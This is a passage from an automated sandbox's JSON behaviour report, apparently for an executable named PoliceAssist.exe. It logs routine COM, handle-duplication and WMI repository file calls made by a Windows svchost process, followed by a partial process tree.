                "value": "00000001-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 1,
            "id": 7
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "348",
            "caller": "0x7ffed40e6b2d",
            "parentcaller": "0x7ffec7f7cae0",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "CD1ABFC8-6C5E-4A8D-B90B-2A3B153B886D"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "00000000-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 1,
            "id": 8
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "348",
            "caller": "0x7ffed3fea4f0",
            "parentcaller": "0x7ffed3fea195",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 1,
            "id": 9
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "348",
            "caller": "0x7ffec7f84e9b",
            "parentcaller": "0x7ffec7f86a2f",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "1108BE51-F58A-4CDA-BB99-7A0227D11D5E"
              },
              {
                "name": "ClsContext",
                "value": "0x00000005",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER"
              },
              {
                "name": "riid",
                "value": "00000001-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 1,
            "id": 10
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "3508",
            "caller": "0x7ffee2fb92b9",
            "parentcaller": "0x7ffee2ff224d",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 1,
            "id": 11
          },
          {
            "timestamp": "2025-11-20 10:58:33,757",
            "thread_id": "3804",
            "caller": "0x7ffedc212508",
            "parentcaller": "0x7ffedc214a51",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "3BC15AF2-736C-477E-9E51-238AF8667DCC"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 7,
            "id": 12
          },
          {
            "timestamp": "2025-11-20 10:58:33,772",
            "thread_id": "3508",
            "caller": "0x7ffed3fea4f0",
            "parentcaller": "0x7ffed3fcd5b5",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 13
          },
          {
            "timestamp": "2025-11-20 10:58:33,772",
            "thread_id": "3508",
            "caller": "0x7ffed40e8250",
            "parentcaller": "0x7ffee33bb583",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "CC9072AB-C000-49D8-A5AA-00266C8DBB9B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "368732C2-80D8-403E-854B-1B2BAFB9842C"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 14
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "348",
            "caller": "0x7ffec7f84e9b",
            "parentcaller": "0x7ffec7f86a2f",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "1108BE51-F58A-4CDA-BB99-7A0227D11D5E"
              },
              {
                "name": "ClsContext",
                "value": "0x00000005",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER"
              },
              {
                "name": "riid",
                "value": "00000001-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 15
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "348",
            "caller": "0x7ffed3feaddd",
            "parentcaller": "0x7ffed3fea3b7",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 16
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "348",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffed95eb50c",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0x000005d0"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x000006fc"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 17
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "348",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffed95eb50c",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0x000005d0"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x000006e4"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 18
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "3804",
            "caller": "0x7ffec7f82823",
            "parentcaller": "0x7ffec7f8978f",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "1108BE51-F58A-4CDA-BB99-7A0227D11D5E"
              },
              {
                "name": "ClsContext",
                "value": "0x00000005",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER"
              },
              {
                "name": "riid",
                "value": "00000001-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 19
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "3804",
            "caller": "0x7ffed3feaddd",
            "parentcaller": "0x7ffed3fea3b7",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 20
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "3804",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffee336ef53",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x000006f0"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 21
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "3804",
            "caller": "0x7ffed3fea85f",
            "parentcaller": "0x7ffed3fea778",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 22
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "3804",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffee2f66d2f",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x000006e0"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 23
          },
          {
            "timestamp": "2025-11-20 10:58:33,788",
            "thread_id": "3508",
            "caller": "0x7ffee2fb92b9",
            "parentcaller": "0x7ffee2ff224d",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 1,
            "id": 24
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "3508",
            "caller": "0x7ffed3fea4f0",
            "parentcaller": "0x7ffed3fcd5b5",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 25
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "3508",
            "caller": "0x7ffed40e8250",
            "parentcaller": "0x7ffee33bb583",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "CC9072AB-C000-49D8-A5AA-00266C8DBB9B"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "368732C2-80D8-403E-854B-1B2BAFB9842C"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 26
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "348",
            "caller": "0x7ffee10fbefb",
            "parentcaller": "0x7ffed5dea158",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000314"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\Repository\\OBJECTS.DATA"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\xc0\\x07\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 27
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "348",
            "caller": "0x7ffee10fbefb",
            "parentcaller": "0x7ffed5dea158",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000314"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\Repository\\OBJECTS.DATA"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\xe0\\x07\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 28
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "348",
            "caller": "0x7ffee10fbefb",
            "parentcaller": "0x7ffed5dea158",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000314"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\Repository\\OBJECTS.DATA"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 29
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "348",
            "caller": "0x7ffee10fbefb",
            "parentcaller": "0x7ffed5dea158",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000314"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\Repository\\OBJECTS.DATA"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00 h\\x01\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 30
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "348",
            "caller": "0x7ffed3fea4f0",
            "parentcaller": "0x7ffed3fea195",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 31
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4252",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffee336ef53",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x00000708"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 32
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "348",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffed95eb50c",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0x00000704"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x0000070c"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 33
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "348",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffed95eb50c",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0x00000704"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x00000710"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 34
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "2480",
            "caller": "0x7ffec7f82823",
            "parentcaller": "0x7ffec7f7ffb3",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "1108BE51-F58A-4CDA-BB99-7A0227D11D5E"
              },
              {
                "name": "ClsContext",
                "value": "0x00000005",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER"
              },
              {
                "name": "riid",
                "value": "00000001-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 35
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "2480",
            "caller": "0x7ffed3feaddd",
            "parentcaller": "0x7ffed3fea3b7",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 36
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "2480",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffee336ef53",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x0000057c"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 37
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "2480",
            "caller": "0x7ffed3fea85f",
            "parentcaller": "0x7ffed3fea778",
            "category": "com",
            "api": "CoGetClassObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "E7D35CFA-348B-485E-B524-252725D697CA"
              },
              {
                "name": "ClsContext",
                "value": "0x80000001",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL"
              },
              {
                "name": "riid",
                "value": "D5F569D0-593B-101A-B569-08002B2DBF7A"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 38
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "2480",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffee2f66d2f",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x00000574"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 39
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4396",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffee336ef53",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x0000060c"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 40
          },
          {
            "timestamp": "2025-11-20 10:58:33,835",
            "thread_id": "4396",
            "caller": "0x7ffee2fb92b9",
            "parentcaller": "0x7ffee2ff224d",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 41
          },
          {
            "timestamp": "2025-11-20 10:58:33,850",
            "thread_id": "4396",
            "caller": "0x7ffee2fb92b9",
            "parentcaller": "0x7ffee2ff224d",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "4590F812-1D3A-11D0-891F-00AA004B2E24"
              },
              {
                "name": "ClsContext",
                "value": "0x00000403",
                "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD"
              },
              {
                "name": "riid",
                "value": "00000003-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 1,
            "id": 42
          },
          {
            "timestamp": "2025-11-20 10:59:21,725",
            "thread_id": "2360",
            "caller": "0x7ff630564340",
            "parentcaller": "0x00000000",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "4FA18276-912A-11D1-AD9B-00C04FD8FDFF"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "00000000-0000-0000-C000-000000000046"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 43
          },
          {
            "timestamp": "2025-11-20 10:59:21,725",
            "thread_id": "2360",
            "caller": "0x7ff630564340",
            "parentcaller": "0x00000000",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "3BC15AF2-736C-477E-9E51-238AF8667DCC"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 44
          },
          {
            "timestamp": "2025-11-20 10:59:21,725",
            "thread_id": "2360",
            "caller": "0x7ff630564340",
            "parentcaller": "0x00000000",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "674B6698-EE92-11D0-AD71-00C04FD8FDFF"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "44ACA674-E8FC-11D0-A07C-00C04FB68820"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 45
          },
          {
            "timestamp": "2025-11-20 10:59:25,100",
            "thread_id": "3352",
            "caller": "0x7ffee10f6f4c",
            "parentcaller": "0x7ffee336ef53",
            "category": "system",
            "api": "NtDuplicateObject",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SourceProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "SourceHandle",
                "value": "0xfffffffe"
              },
              {
                "name": "TargetProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "TargetHandle",
                "value": "0x00000274"
              },
              {
                "name": "Options",
                "value": "0x00000002"
              }
            ],
            "repeated": 0,
            "id": 46
          }
        ],
        "threads": [
          "3508",
          "348",
          "3804",
          "4252",
          "2480",
          "4396",
          "2360",
          "3352"
        ],
        "environ": {
          "UserName": "СИСТЕМА",
          "ComputerName": "HOME-PC",
          "WindowsPath": "C:\\Windows",
          "TempPath": "C:\\Temp\\",
          "CommandLine": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p",
          "RegisteredOwner": "",
          "RegisteredOrganization": "",
          "ProductName": "",
          "SystemVolumeSerialNumber": "a0c0-2cc3",
          "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000",
          "MachineGUID": "",
          "MainExeBase": "0x7ff630560000",
          "MainExeSize": "0x00010000",
          "Bitness": "64-bit"
        },
        "file_activities": {
          "read_files": [],
          "write_files": [],
          "delete_files": []
        }
      }
    ],
    "anomaly": [],
    "processtree": [
      {
        "name": "explorer.exe",
        "pid": 2552,
        "parent_id": 2516,
        "module_path": "C:\\Windows\\explorer.exe",
        "children": [],
        "threads": [
          "3400",
          "2800",
          "2996",
          "2768",
          "3512",
          "2840",
          "4072",
          "4068",
          "4032",
          "3360"
        ],
        "environ": {
          "UserName": "Admin",
          "ComputerName": "HOME-PC",
          "WindowsPath": "C:\\Windows",
          "TempPath": "C:\\Temp\\",
          "CommandLine": "C:\\Windows\\Explorer.EXE",
          "RegisteredOwner": "",
          "RegisteredOrganization": "",
          "ProductName": "",
          "SystemVolumeSerialNumber": "a0c0-2cc3",
          "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000",
          "MachineGUID": "",
          "MainExeBase": "0x7ff735ff0000",
          "MainExeSize": "0x00546000",
          "Bitness": "64-bit"
        }
      },
      {
        "name": "PoliceAssist.exe",
        "pid": 3308,
        "parent_id": 2736,
        "module_path": "C:\\Temp\\PoliceAssist.exe",
        "children": [],
        "threads": [
          "2188",
          "2060",
          "1600",
          "404",
          "3824",
          "2432",
          "1596",
          "3408",
          "4536",
          "1704",
          "2336",
          "3704",
          "4488"
        ],
        "environ": {
          "UserName": "Admin",
          "ComputerName": "HOME-PC",
          "WindowsPath": "C:\\Windows",
          "TempPath": "C:\\Temp\\",
          "CommandLine": "\"C:\\Temp\\PoliceAssist.exe\" ",
          "RegisteredOwner": "",
          "RegisteredOrganization": "",
          "ProductName": "",
          "SystemVolumeSerialNumber": "a0c0-2cc3",
          "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000",
          "MachineGUID": "",
          "MainExeBase": "0x140000000",
          "MainExeSize": "0x0013a000",
          "Bitness": "64-bit"
        }
      },
      {
        "name": "svchost.exe",
        "pid": 740,
        "parent_id": 600,
        "module_path": "C:\\Windows\\System32\\svchost.exe",
        "children": [
          {
            "name": "WmiPrvSE.exe",
            "pid": 3164,
            "parent_id": 740,
            "module_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
            "children": [],
            "threads": [
              "3424",
              "1388",
              "1260",
              "4244",
              "4248",
              "4240",
              "4280"
            ],
            "environ": {
              "UserName": "HOME-PC$",
              "ComputerName": "HOME-PC",
              "WindowsPath": "C:\\Windows",
              "TempPath": "C:\\Temp\\",
              "CommandLine": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
              "RegisteredOwner": "",
              "RegisteredOrganization": "",
              "ProductName": "",
              "SystemVolumeSerialNumber": "a0c0-2cc3",
              "SystemVolumeGUID": "2d3f192c-0000-0000-0000-300300000000",
              "MachineGUID": "",
              "MainExeBase": "0x7ff79aaf0000",
              "MainExeSize": "0x0007e000",
              "Bitness": "64-bit"
            }
          }
        ],
        "threads": [
          "912",
          "324",
          "2872",
          "4640"
        ],
